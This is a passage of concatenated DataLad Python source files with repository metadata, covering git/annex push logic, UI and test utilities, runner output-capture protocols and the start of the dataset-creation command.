# TODO?: expose order as an option for diff and push\n # since in some cases breadth-first would be sufficient\n # and result in \"taking action faster\"\n reporting_order='bottom-up'\n ):\n if res.get('action', None) != 'diff':\n # we don't care right now\n continue\n if res.get('status', None) != 'ok':\n # we cannot handle this situation, report it in panic\n raise RuntimeError(\n 'Cannot handle non-OK diff result: {}'.format(res))\n parentds = res.get('parentds', None)\n if not parentds:\n raise RuntimeError(\n 'Cannot handle diff result without a parent dataset '\n 'property: {}'.format(res))\n if res.get('type', None) == 'dataset':\n # a subdataset record in another dataset\n # this could be here, because\n # - this dataset was explicitly requested by path\n # -> should get a dedicated dataset record -- even without recursion\n # - a path within an existing subdataset was given\n # - a path within an non-existing subdataset was given\n # locally or not)\n # -> it should be ignored, but should not cause the branch in the\n # superdataset not to be pushed, if this was the only change\n p = Path(res['path'])\n # was given as an explicit path argument\n if any(arg == p for arg in paths) and \\\n not GitRepo.is_valid_repo(res['path']):\n raise ValueError(\n 'Cannot publish subdataset, not present: {}'.format(res['path']))\n\n if parentds != cur_ds:\n if ds_res:\n # we switch to another dataset, yield this one so outside\n # code can start processing immediately\n yield (cur_ds, ds_res)\n # clean start\n ds_res = []\n cur_ds = parentds\n ds_res.append({\n k: v for k, v in res.items()\n if k in (\n # let's keep 'state' in for now, it would make it possible\n # to implement a \"sync\"-type push downstream that actually\n # pulls 'deleted' files\n 'state',\n # 'file' to copy-to, and subdataset records to possibly\n # act on\n 'type',\n # essential\n 'path')\n })\n\n # if we have something left to report, do it\n # importantly do not test for ds_res, even if we had only seen subdataset\n # records to be changes, we would still want to push the git branches\n if cur_ds:\n yield (cur_ds, ds_res)\n\n\n@todo_interface_for_extensions\ndef _transfer_data(repo, ds, target, content, data, force, jobs, res_kwargs,\n got_path_arg):\n yield from _push_data(\n ds,\n target,\n content,\n data,\n force,\n jobs,\n res_kwargs.copy(),\n got_path_arg=got_path_arg,\n )\n\n\ndef _push(dspath, content, target, data, force, jobs, res_kwargs, pbars,\n got_path_arg=False):\n force_git_push = force in ('all', 'gitpush')\n\n # nothing recursive in here, we only need a repo to work with\n ds = Dataset(dspath)\n repo = ds.repo\n\n res_kwargs.update(type='dataset', path=dspath)\n\n # content will be unique for every push (even on the same dataset)\n pbar_id = 'push-{}-{}'.format(target, id(content))\n # register for final orderly take down\n pbars[pbar_id] = ds\n log_progress(\n lgr.info, pbar_id,\n 'Determine push target',\n unit=' Steps',\n label='Push',\n total=4,\n )\n # pristine input arg\n _target = target\n # verified or auto-detected\n target = None\n if not _target:\n try:\n try:\n # let Git figure out what needs doing\n # we will reuse the result further down again, so nothing is wasted\n wannabe_gitpush = repo.push(remote=None, git_options=['--dry-run'])\n # we did not get an explicit push target, get it from Git\n target = set(p.get('remote', None) for p in wannabe_gitpush)\n # handle case where a pushinfo record did not have a 'remote'\n # property -- should not happen, but be robust\n target.discard(None)\n except CommandError as e:\n if 'Please make sure you have the correct access rights' in e.stderr:\n # there is a default push target but we have no permission\n yield dict(\n res_kwargs,\n status='impossible',\n message='Attempt to push to default target resulted in following '\n 'error. Address the error or specify different target with --to: '\n + e.stderr,\n )\n return\n raise\n except Exception as e:\n lgr.debug(\n 'Dry-run push to determine default push target failed, '\n 'assume no configuration: %s', e)\n target = set()\n if not len(target):\n yield dict(\n res_kwargs,\n status='impossible',\n message='No push target given, and none could be '\n 'auto-detected, please specify via --to',\n )\n return\n elif len(target) > 1:\n # dunno if this can ever happen, but if it does, report\n # nicely\n yield dict(\n res_kwargs,\n status='error',\n message=(\n 'No push target given, '\n 'multiple candidates auto-detected: %s',\n list(target),\n )\n )\n return\n else:\n # can only be a single one at this point\n target = target.pop()\n\n if not target:\n if _target not in repo.get_remotes():\n yield dict(\n res_kwargs,\n status='error',\n message=(\n \"Unknown target sibling '%s'.\", _target))\n return\n target = _target\n\n log_progress(\n lgr.info, pbar_id, \"Push refspecs\",\n label=\"Push to '{}'\".format(target), update=1, total=4)\n\n # define config var name for potential publication dependencies\n depvar = 'remote.{}.datalad-publish-depends'.format(target)\n # list of remotes that are publication dependencies for the\n # target remote\n publish_depends = ensure_list(ds.config.get(depvar, [], get_all=True))\n if publish_depends:\n lgr.debug(\"Discovered publication dependencies for '%s': %s'\",\n target, publish_depends)\n\n # cache repo type\n is_annex_repo = isinstance(ds.repo, AnnexRepo)\n\n # TODO prevent this when `target` is a special remote\n # (possibly redo) a push attempt to figure out what needs pushing\n # do this on the main target only, and apply the result to all\n # dependencies\n try:\n if _target:\n # only do it when an explicit target was given, otherwise\n # we can reuse the result from the auto-probing above\n wannabe_gitpush = repo.push(\n remote=target,\n git_options=['--dry-run'])\n except Exception as e:\n lgr.debug(\n 'Dry-run push to check push configuration failed, '\n 'assume no configuration: %s', e)\n wannabe_gitpush = []\n refspecs2push = [\n # if an upstream branch is set, go with it\n p['from_ref']\n if ds.config.get(\n # refs come in as refs/heads/<branchname>\n # need to cut the prefix\n 'branch.{}.remote'.format(p['from_ref'][11:]),\n None) == target and ds.config.get(\n 'branch.{}.merge'.format(p['from_ref'][11:]),\n None)\n # if not, define target refspec explicitly to avoid having to\n # set an upstream branch, which would happen implicitly from\n # a users POV, and may also be hard to decide when publication\n # dependencies are present\n else '{}:{}'.format(p['from_ref'], p['to_ref'])\n for p in wannabe_gitpush\n # TODO: what if a publication dependency doesn't have it yet\n # should we not attempt to push, because the main target has it?\n if 'uptodate' not in p['operations'] and (\n # cannot think of a scenario where we would want to push a\n # managed branch directly, instead of the corresponding branch\n 'refs/heads/adjusted' not in p['from_ref'])\n ]\n # TODO this is not right with managed branches\n active_branch = repo.get_active_branch()\n if active_branch and is_annex_repo:\n # we could face a managed branch, in which case we need to\n # determine the actual one and make sure it is sync'ed with the\n # managed one, and push that one instead. following methods can\n # be called unconditionally\n repo.localsync(managed_only=True)\n active_branch = repo.get_corresponding_branch(\n active_branch) or active_branch\n\n if not refspecs2push and not active_branch:\n # nothing was set up for push, and we have no active branch\n # this is a weird one, let's confess and stop here\n # I don't think we need to support such a scenario\n if not active_branch:\n yield dict(\n res_kwargs,\n status='impossible',\n message=\n 'There is no active branch, cannot determine remote '\n 'branch'\n )\n return\n\n # make sure that we always push the active branch (the context for the\n # potential path arguments) and the annex branch -- because we claim\n # to know better than any git config\n must_have_branches = [active_branch] if active_branch else []\n if is_annex_repo:\n must_have_branches.append('git-annex')\n for branch in must_have_branches:\n _append_branch_to_refspec_if_needed(ds, refspecs2push, branch)\n\n # we know what to push and where, now dependency processing first\n for r in publish_depends:\n # simply make a call to this function again, all the same, but\n # target is different\n yield from _push(\n dspath,\n content,\n # to this particular dependency\n r,\n data,\n force,\n jobs,\n res_kwargs.copy(),\n pbars,\n got_path_arg=got_path_arg,\n )\n\n # and lastly the primary push target\n target_is_git_remote = repo.config.get(\n 'remote.{}.url'.format(target), None) is not None\n\n # git-annex data copy\n #\n if is_annex_repo:\n if data != \"nothing\":\n log_progress(\n lgr.info, pbar_id, \"Transfer data\",\n label=\"Transfer data to '{}'\".format(target), update=2, total=4)\n yield from _transfer_data(\n repo,\n ds,\n target,\n content,\n data,\n force,\n jobs,\n res_kwargs.copy(),\n got_path_arg=got_path_arg,\n )\n else:\n lgr.debug(\"Data transfer to '%s' disabled by argument\", target)\n else:\n lgr.debug(\"No data transfer: %s is not a git annex repository\", repo)\n\n if not target_is_git_remote:\n # there is nothing that we need to push or sync with on the git-side\n # of things with this remote\n return\n\n log_progress(\n lgr.info, pbar_id, \"Update availability information\",\n label=\"Update availability for '{}'\".format(target), update=3, total=4)\n\n # TODO fetch is only needed if anything was actually transferred. Collect this\n # info and make the following conditional on it\n\n # after file transfer the remote might have different commits to\n # the annex branch. They have to be merged locally, otherwise a\n # push of it further down will fail\n try:\n # fetch remote, let annex sync them locally, so that the push\n # later on works.\n # We have to fetch via the push url (if there is any),\n # not a pull url.\n # The latter might be dumb and without the execution of a\n # post-update hook we might not be able to retrieve the\n # server-side git-annex branch updates (and git-annex does\n # not trigger the hook on copy), but we know we have\n # full access via the push url -- we have just used it to copy.\n lgr.debug(\"Fetching 'git-annex' branch updates from '%s'\", target)\n fetch_cmd = ['fetch', target, 'git-annex']\n pushurl = repo.config.get(\n 'remote.{}.pushurl'.format(target), None)\n if pushurl:\n # for some reason overwriting remote.{target}.url\n # does not have any effect...\n fetch_cmd = [\n '-c',\n 'url.{}.insteadof={}'.format(\n pushurl,\n repo.config.get(\n 'remote.{}.url'.format(target), None)\n )\n ] + fetch_cmd\n lgr.debug(\n \"Sync local annex branch from pushurl after remote \"\n 'availability update.')\n repo.call_git(fetch_cmd)\n # If no CommandError was raised, it means that remote has git-annex\n # but local repo might not be an annex yet. Since there is nothing to \"sync\"\n # from us, we just skip localsync without mutating repo into an AnnexRepo\n if is_annex_repo:\n repo.localsync(target)\n except CommandError as e:\n # it is OK if the remote doesn't have a git-annex branch yet\n # (e.g. fresh repo)\n # TODO is this possible? we just copied? Maybe check if anything\n # was actually copied?\n if \"fatal: couldn't find remote ref git-annex\" not in e.stderr.lower():\n raise\n lgr.debug('Remote does not have a git-annex branch: %s', e)\n\n if not refspecs2push:\n lgr.debug('No refspecs found that need to be pushed')\n return\n\n # and push all relevant branches, plus the git-annex branch to announce\n # local availability info too\n yield from _push_refspecs(\n repo,\n target,\n refspecs2push,\n force_git_push,\n res_kwargs.copy(),\n )\n\n\ndef _append_branch_to_refspec_if_needed(ds, refspecs, branch):\n # try to anticipate any flavor of an idea of a branch ending up in a refspec\n looks_like_that_branch = re.compile(\n r'((^|.*:)refs/heads/|.*:|^){}$'.format(branch))\n if all(not looks_like_that_branch.match(r) for r in refspecs):\n refspecs.append(\n branch\n if ds.config.get('branch.{}.merge'.format(branch), None)\n else '{branch}:{branch}'.format(branch=branch)\n )\n\n\ndef _push_refspecs(repo, target, refspecs, force_git_push, res_kwargs):\n push_res = repo.push(\n remote=target,\n refspec=refspecs,\n git_options=['--force'] if force_git_push else None,\n )\n # TODO maybe compress into a single message whenever everything is\n # OK?\n for pr in push_res:\n ops = pr['operations']\n status = (\n 'error'\n if any(o in ops for o in (\n 'error', 'no-match', 'rejected', 'remote-rejected',\n 'remote-failure'))\n else 'notneeded'\n if 'uptodate' in pr['operations']\n else 'ok'\n if any(o in ops for o in (\n 'new-tag', 'new-branch', 'forced-update', 'fast-forward'))\n # no really a good fit, but we have tested all relevant\n # operations above, so in some sense this condition should be\n # impossible to achieve\n else 'impossible'\n )\n refspec = '{}:{}'.format(pr['from_ref'], pr['to_ref'])\n yield dict(\n res_kwargs,\n status=status,\n target=pr['remote'],\n refspec=refspec,\n operations=ops,\n hints=pr.get('hints', None),\n # seems like a good idea to pass on Git's native message\n # TODO maybe implement a dedicated result renderer, instead\n # of duplicating information only so that the default one\n # can make sense at all\n message='{}->{}:{} {}'.format(\n pr['from_ref'],\n pr['remote'],\n pr['to_ref'],\n pr['note']),\n )\n\n\ndef _push_data(ds, target, content, data, force, jobs, res_kwargs,\n got_path_arg=False):\n if ds.config.getbool('remote.{}'.format(target), 'annex-ignore', False):\n lgr.debug(\n \"Target '%s' is set to annex-ignore, exclude from data-push.\",\n target,\n )\n return\n\n ds_repo = ds.repo\n\n res_kwargs['target'] = target\n if not ds.config.get('.'.join(('remote', target, 'annex-uuid')), None):\n # this remote either isn't an annex,\n # or hasn't been properly initialized\n # given that there was no annex-ignore, let's try to init it\n # see https://github.com/datalad/datalad/issues/5143 for the story\n ds_repo.localsync(target)\n\n if not ds.config.get('.'.join(('remote', target, 'annex-uuid')), None):\n # still nothing\n # rather than barfing tons of messages for each file, do one\n # for the entire dataset\n yield dict(\n res_kwargs,\n action='copy',\n status='impossible'\n if force in ('all', 'checkdatapresent')\n else 'notneeded',\n message=(\n \"Target '%s' does not appear to be an annex remote\",\n target)\n )\n return\n\n # it really looks like we will transfer files, get info on what annex\n # has in store\n # paths must be recoded to a dataset REPO root (in case of a symlinked\n # location\n annex_info_init = \\\n {ds_repo.pathobj / Path(c['path']).relative_to(ds.pathobj): c\n for c in content} if ds.pathobj != ds_repo.pathobj else \\\n {Path(c['path']): c for c in content}\n content = ds.repo.get_content_annexinfo(\n # paths are taken from `annex_info_init`\n paths=None,\n init=annex_info_init,\n ref='HEAD',\n # this is an expensive operation that is only needed\n # to perform a warning below, and for more accurate\n # progress reporting (exclude unavailable content).\n # limit to cases with explicit paths provided\n eval_availability=True if got_path_arg else False,\n )\n # figure out which of the reported content (after evaluating\n # `since` and `path` arguments needs transport\n to_transfer = [\n c\n for c in content.values()\n # by force\n if ((force in ('all', 'checkdatapresent') or\n # or by modification report\n c.get('state', None) not in ('clean', 'deleted'))\n # only consider annex'ed files\n and 'key' in c\n )\n ]\n if got_path_arg:\n for c in [c for c in to_transfer if not c.get('has_content', False)]:\n yield dict(\n res_kwargs,\n type=c['type'],\n path=c['path'],\n action='copy',\n status='impossible',\n message='Slated for transport, but no content present',\n )\n\n cmd = ['copy', '--batch', '-z', '--to', target]\n\n if jobs:\n cmd.extend(['--jobs', str(jobs)])\n\n # Since we got here - we already have some data != \"nothing\"\n if (data == 'auto') or \\\n (\n (data == 'auto-if-wanted') and\n ds_repo.get_preferred_content('wanted', target)\n ):\n lgr.debug(\"Invoking copy --auto\")\n cmd.append('--auto')\n\n if force not in ('all', 'checkdatapresent'):\n # if we force, we do not trust local knowledge and do the checks\n cmd.append('--fast')\n\n lgr.debug(\"Pushing data from %s to '%s'\", ds, target)\n\n # input has type=dataset, but now it is about files\n res_kwargs.pop('type', None)\n\n # A set and a dict is used to track files pointing to the\n # same key. The set could be dropped, using a single dictionary\n # that has an entry for every seen key and a (likely empty) list\n # of redundant files, but that would mean looping over potentially\n # many keys to yield likely few if any notneeded results.\n seen_keys = set()\n repkey_paths = dict()\n\n # produce final path list. use knowledge that annex command will\n # run in the root of the dataset and compact paths to be relative\n # to this location\n file_list = b''\n nbytes = 0\n for c in to_transfer:\n key = c['key']\n if key in seen_keys:\n repkey_paths.setdefault(key, []).append(c['path'])\n else:\n file_list += bytes(Path(c['path']).relative_to(ds.pathobj))\n file_list += b'\\0'\n nbytes += c.get('bytesize', 0)\n seen_keys.add(key)\n lgr.debug('Counted %d bytes of annex data to transfer',\n nbytes)\n\n # and go\n res = ds_repo._call_annex_records(\n cmd,\n git_options=[\n \"-c\",\n \"annex.retry={}\".format(\n ds_repo.config.obtain(\"datalad.annex.retry\"))]\n if ds_repo.config.get(\"annex.retry\") else None,\n stdin=file_list,\n progress=True,\n # tailor the progress protocol with the total number of files\n # to be transferred\n total_nbytes=nbytes)\n for j in res:\n yield annexjson2result(j, ds, type='file', **res_kwargs)\n\n for annex_key, paths in repkey_paths.items():\n for path in paths:\n yield dict(\n res_kwargs, action='copy', type='file', status='notneeded',\n path=path, annexkey=annex_key,\n message='Another file points to the same key')\n return\n\n\ndef _get_corresponding_remote_state(repo, to):\n since = None\n # for managed branches we cannot assume a matching one at the remote end\n # instead we target the corresponding branch\n active_branch = repo.get_corresponding_branch() or repo.get_active_branch()\n\n if to:\n # XXX here we assume one to one mapping of names from local branches\n # to the remote\n since = '%s/%s' % (to, active_branch)\n else:\n # take tracking remote for the active branch\n tracked_remote, tracked_refspec = repo.get_tracking_branch()\n if tracked_remote:\n if tracked_refspec.startswith('refs/heads/'):\n tracked_refspec = tracked_refspec[len('refs/heads/'):]\n #to = tracked_remote\n since = '%s/%s' % (tracked_remote, tracked_refspec)\n return since\n" }, { "alpha_fraction": 0.47640448808670044, "alphanum_fraction": 0.483146071434021, "avg_line_length": 36.08333206176758, "blob_id": "f5404c2800bec7747c50f308acc9373fb32b49c5", "content_id": "9fe85d3766e42c8e9bd6d23ce28957c948cfc4cd", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 445, "license_type": "permissive", "max_line_length": 79, "num_lines": 12, "path": "/datalad/support/tests/utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Utils for testing support module\n\"\"\"\n\nfrom datalad.support.external_versions import external_versions\nfrom datalad.tests.utils_pytest import *\n" }, { "alpha_fraction": 0.5805310010910034, "alphanum_fraction": 0.5858407020568848, "avg_line_length": 24.917430877685547, "blob_id": "f9a9107c80c4fe6e05f9dda0ef77f52223471c65", "content_id": "b4115cecea2b9dfc4b0119113c73d5cb4784b455", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2825, "license_type": "permissive", "max_line_length": 88, "num_lines": 109, "path": "/datalad/ui/tests/test_base.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-wstrth: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"tests for UI switcher\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nfrom unittest.mock import patch\n\nfrom ...tests.utils_pytest import (\n assert_equal,\n assert_false,\n assert_not_equal,\n assert_raises,\n with_testsui,\n)\nfrom .. import _UI_Switcher\nfrom ..dialog import (\n ConsoleLog,\n DialogUI,\n IPythonUI,\n)\n\n\ndef test_ui_switcher():\n ui = _UI_Switcher('dialog')\n assert(isinstance(ui.ui, DialogUI))\n message_str = str(ui.message)\n assert_equal(message_str, str(ui._ui.message))\n\n ui.set_backend('console')\n assert(isinstance(ui.ui, ConsoleLog))\n assert_equal(str(ui.message), str(ui._ui.message))\n assert_not_equal(message_str, str(ui._ui.message))\n with assert_raises(AttributeError):\n ui.yesno\n\n ui.set_backend('annex')\n\n # Let's pretend we are under IPython\n class ZMQInteractiveShell(object):\n pass\n\n with patch('datalad.utils.get_ipython',\n lambda: ZMQInteractiveShell(),\n create=True):\n ui = _UI_Switcher()\n assert (isinstance(ui.ui, IPythonUI))\n\n\ndef test_tests_ui():\n ui = _UI_Switcher('dialog')\n # Let's test our responses construct\n ui.set_backend('tests')\n with ui.add_responses('abc'):\n assert_equal(ui.question(\"text\"), 'abc')\n\n with ui.add_responses(['a', 'bb']):\n assert_equal(ui.question(\"text\"), 'a')\n assert_equal(ui.question(\"text\"), 'bb')\n\n # should raise exception if not all responses were\n # used\n with assert_raises(AssertionError):\n with ui.add_responses(['a', 'bb']):\n assert_equal(ui.question(\"text\"), 'a')\n\n # but clear it up\n assert_false(ui.get_responses())\n\n # assure that still works\n with ui.add_responses('abc'):\n assert_equal(ui.question(\"text\"), 'abc')\n\n # and if we switch back to some other backend -- we would loose *responses methods\n ui.set_backend('annex')\n assert_false(hasattr(ui, 'add_responses'))\n\n\ndef test_with_testsui():\n\n @with_testsui\n def nothing(x, k=1):\n assert_equal(x, 1)\n assert_equal(k, 2)\n\n nothing(1, k=2)\n\n @with_testsui(responses='a')\n def nothing(x, k=1):\n assert_equal(x, 1)\n assert_equal(k, 2)\n\n # responses were not used\n assert_raises(AssertionError, nothing, 1, k=2)\n\n from datalad.ui import ui\n\n @with_testsui(responses='a')\n def ask():\n assert_equal(ui.question('what is a?'), 'a')\n\n\n ask()\n" }, { "alpha_fraction": 0.613942563533783, "alphanum_fraction": 0.6186291575431824, "avg_line_length": 28.947368621826172, "blob_id": "83db6573ac4e6e133773c3319d9415ff78ed76b1", "content_id": "de8f8ceaef1b21b8c6d57e53b60583605b89e45f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1707, "license_type": "permissive", "max_line_length": 87, "num_lines": 57, "path": "/datalad/runner/coreprotocols.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Generic core protocols for use with the DataLad runner\n\"\"\"\n\nimport logging\n\nfrom .protocol import WitlessProtocol\n\nlgr = logging.getLogger('datalad.runner.coreprotocols')\n\n\nclass NoCapture(WitlessProtocol):\n \"\"\"WitlessProtocol that captures no subprocess output\n\n As this is identical with the behavior of the WitlessProtocol base class,\n this class is merely a more readable convenience alias.\n \"\"\"\n pass\n\n\nclass StdOutCapture(WitlessProtocol):\n \"\"\"WitlessProtocol that only captures and returns stdout of a subprocess\"\"\"\n proc_out = True\n\n\nclass StdErrCapture(WitlessProtocol):\n \"\"\"WitlessProtocol that only captures and returns stderr of a subprocess\"\"\"\n proc_err = True\n\n\nclass StdOutErrCapture(WitlessProtocol):\n \"\"\"WitlessProtocol that captures and returns stdout/stderr of a subprocess\n \"\"\"\n proc_out = True\n proc_err = True\n\n\nclass KillOutput(WitlessProtocol):\n \"\"\"WitlessProtocol that swallows stdout/stderr of a subprocess\n \"\"\"\n proc_out = True\n proc_err = True\n\n def pipe_data_received(self, fd: int, data: bytes) -> None:\n assert self.process is not None\n if lgr.isEnabledFor(5):\n lgr.log(\n 5,\n 'Discarded %i bytes from %i[%s]',\n len(data), self.process.pid, self.fd_infos[fd][0])\n" }, { "alpha_fraction": 0.5708751678466797, "alphanum_fraction": 0.571956217288971, "avg_line_length": 37.67770004272461, "blob_id": "a8ec979107967404b65f5f49987886317ea6db4c", "content_id": "d49f5ddff94fb93b5b2e5dc25435b7333c28d8db", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22201, "license_type": "permissive", "max_line_length": 90, "num_lines": 574, "path": "/datalad/core/local/create.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"High-level interface for dataset creation\n\n\"\"\"\n\nimport os\nimport logging\nimport random\nimport uuid\nimport warnings\nfrom argparse import (\n REMAINDER,\n)\n\nfrom os import listdir\nimport os.path as op\n\nfrom datalad import cfg\nfrom datalad import _seed\nfrom datalad.interface.base import Interface\nfrom datalad.interface.base import (\n build_doc,\n eval_results,\n)\nfrom datalad.interface.common_opts import (\n location_description,\n)\nfrom datalad.support.constraints import (\n EnsureStr,\n EnsureNone,\n EnsureKeyChoice,\n)\nfrom datalad.support.param import Parameter\nfrom datalad.utils import (\n getpwd,\n ensure_list,\n get_dataset_root,\n Path,\n)\n\nfrom datalad.distribution.dataset import (\n Dataset,\n datasetmethod,\n EnsureDataset,\n resolve_path,\n path_under_rev_dataset,\n require_dataset,\n)\n\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.support.annexrepo import AnnexRepo\n\n\n__docformat__ = 'restructuredtext'\n\nlgr = logging.getLogger('datalad.core.local.create')\n\n\n@build_doc\nclass Create(Interface):\n \"\"\"Create a new dataset from scratch.\n\n This command initializes a new dataset at a given location, or the\n current directory. The new dataset can optionally be registered in an\n existing superdataset (the new dataset's path needs to be located\n within the superdataset for that, and the superdataset needs to be given\n explicitly via [PY: `dataset` PY][CMD: --dataset CMD]). It is recommended\n to provide a brief description to label the dataset's nature *and*\n location, e.g. \"Michael's music on black laptop\". This helps humans to\n identify data locations in distributed scenarios. By default an identifier\n comprised of user and machine name, plus path will be generated.\n\n This command only creates a new dataset, it does not add existing content\n to it, even if the target directory already contains additional files or\n directories.\n\n Plain Git repositories can be created via [PY: `annex=False` PY][CMD: --no-annex CMD].\n However, the result will not be a full dataset, and, consequently,\n not all features are supported (e.g. a description).\n\n || REFLOW >>\n To create a local version of a remote dataset use the\n :func:`~datalad.api.install` command instead.\n << REFLOW ||\n\n .. note::\n Power-user info: This command uses :command:`git init` and\n :command:`git annex init` to prepare the new dataset. Registering to a\n superdataset is performed via a :command:`git submodule add` operation\n in the discovered superdataset.\n \"\"\"\n\n # in general this command will yield exactly one result\n return_type = 'item-or-list'\n # in general users expect to get an instance of the created dataset\n result_xfm = 'datasets'\n # result filter\n result_filter = \\\n EnsureKeyChoice('action', ('create',)) & \\\n EnsureKeyChoice('status', ('ok', 'notneeded'))\n\n _examples_ = [\n dict(text=\"Create a dataset 'mydataset' in the current directory\",\n code_py=\"create(path='mydataset')\",\n code_cmd=\"datalad create mydataset\"),\n dict(text=\"Apply the text2git procedure upon creation of a dataset\",\n code_py=\"create(path='mydataset', cfg_proc='text2git')\",\n code_cmd=\"datalad create -c text2git mydataset\"),\n dict(text=\"Create a subdataset in the root of an existing dataset\",\n code_py=\"create(dataset='.', path='mysubdataset')\",\n code_cmd=\"datalad create -d . mysubdataset\"),\n dict(text=\"Create a dataset in an existing, non-empty directory\",\n code_py=\"create(force=True)\",\n code_cmd=\"datalad create --force\"),\n dict(text=\"Create a plain Git repository\",\n code_py=\"create(path='mydataset', annex=False)\",\n code_cmd=\"datalad create --no-annex mydataset\"),\n ]\n\n _params_ = dict(\n path=Parameter(\n args=(\"path\",),\n nargs='?',\n metavar='PATH',\n doc=\"\"\"path where the dataset shall be created, directories\n will be created as necessary. If no location is provided, a dataset\n will be created in the location specified by [PY: `dataset`\n PY][CMD: --dataset CMD] (if given) or the current working\n directory. Either way the command will error if the target\n directory is not empty. Use [PY: `force` PY][CMD: --force CMD] to\n create a dataset in a non-empty directory.\"\"\",\n # put dataset 2nd to avoid useless conversion\n constraints=EnsureStr() | EnsureDataset() | EnsureNone()),\n initopts=Parameter(\n args=(\"initopts\",),\n metavar='INIT OPTIONS',\n nargs=REMAINDER,\n doc=\"\"\"options to pass to :command:`git init`. [PY: Options can be\n given as a list of command line arguments or as a GitPython-style\n option dictionary PY][CMD: Any argument specified after the\n destination path of the repository will be passed to git-init\n as-is CMD]. Note that not all options will lead to viable results.\n For example '--bare' will not yield a repository where DataLad\n can adjust files in its working tree.\"\"\"),\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n metavar='DATASET',\n doc=\"\"\"specify the dataset to perform the create operation on. If\n a dataset is given along with `path`, a new subdataset will be created\n in it at the `path` provided to the create command. If a dataset is\n given but `path` is unspecified, a new dataset will be created at the\n location specified by this option.\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n force=Parameter(\n args=(\"-f\", \"--force\",),\n doc=\"\"\"enforce creation of a dataset in a non-empty directory\"\"\",\n action='store_true'),\n description=location_description,\n annex=Parameter(\n args=(\"--no-annex\",),\n dest='annex',\n doc=\"\"\"if [CMD: set CMD][PY: disabled PY], a plain Git repository\n will be created without any annex\"\"\",\n action='store_false'),\n # TODO seems to only cause a config flag to be set, this could be done\n # in a procedure\n fake_dates=Parameter(\n args=('--fake-dates',),\n action='store_true',\n doc=\"\"\"Configure the repository to use fake dates. The date for a\n new commit will be set to one second later than the latest commit\n in the repository. This can be used to anonymize dates.\"\"\"),\n cfg_proc=Parameter(\n args=(\"-c\", \"--cfg-proc\"),\n metavar=\"PROC\",\n action='append',\n doc=\"\"\"Run cfg_PROC procedure(s) (can be specified multiple times)\n on the created dataset. Use\n [PY: `run_procedure(discover=True)` PY][CMD: run-procedure --discover CMD]\n to get a list of available procedures, such as cfg_text2git.\n \"\"\"\n )\n )\n\n @staticmethod\n @datasetmethod(name='create')\n @eval_results\n def __call__(\n path=None,\n initopts=None,\n *,\n force=False,\n description=None,\n dataset=None,\n annex=True,\n fake_dates=False,\n cfg_proc=None\n ):\n # we only perform negative tests below\n no_annex = not annex\n\n if dataset:\n if isinstance(dataset, Dataset):\n ds = dataset\n else:\n ds = Dataset(dataset)\n refds_path = ds.path\n else:\n ds = refds_path = None\n\n # two major cases\n # 1. we got a `dataset` -> we either want to create it (path is None),\n # or another dataset in it (path is not None)\n # 2. we got no dataset -> we want to create a fresh dataset at the\n # desired location, either at `path` or PWD\n\n # sanity check first\n if no_annex:\n if description:\n raise ValueError(\"Incompatible arguments: cannot specify \"\n \"description for annex repo and declaring \"\n \"no annex repo.\")\n\n if (isinstance(initopts, (list, tuple)) and '--bare' in initopts) or (\n isinstance(initopts, dict) and 'bare' in initopts):\n raise ValueError(\n \"Creation of bare repositories is not supported. Consider \"\n \"one of the create-sibling commands, or use \"\n \"Git to init a bare repository and push an existing dataset \"\n \"into it.\")\n\n if path:\n path = resolve_path(path, dataset)\n\n path = path if path \\\n else getpwd() if ds is None \\\n else refds_path\n\n # we know that we need to create a dataset at `path`\n assert(path is not None)\n\n # assure cfg_proc is a list (relevant if used via Python API)\n cfg_proc = ensure_list(cfg_proc)\n\n # prep for yield\n res = dict(action='create', path=str(path),\n logger=lgr, type='dataset',\n refds=refds_path)\n\n refds = None\n if refds_path and refds_path != str(path):\n refds = require_dataset(\n refds_path, check_installed=True,\n purpose='create a subdataset')\n\n path_inrefds = path_under_rev_dataset(refds, path)\n if path_inrefds is None:\n yield dict(\n res,\n status='error',\n message=(\n \"dataset containing given paths is not underneath \"\n \"the reference dataset %s: %s\",\n ds, str(path)),\n )\n return\n\n # try to locate an immediate parent dataset\n # we want to know this (irrespective 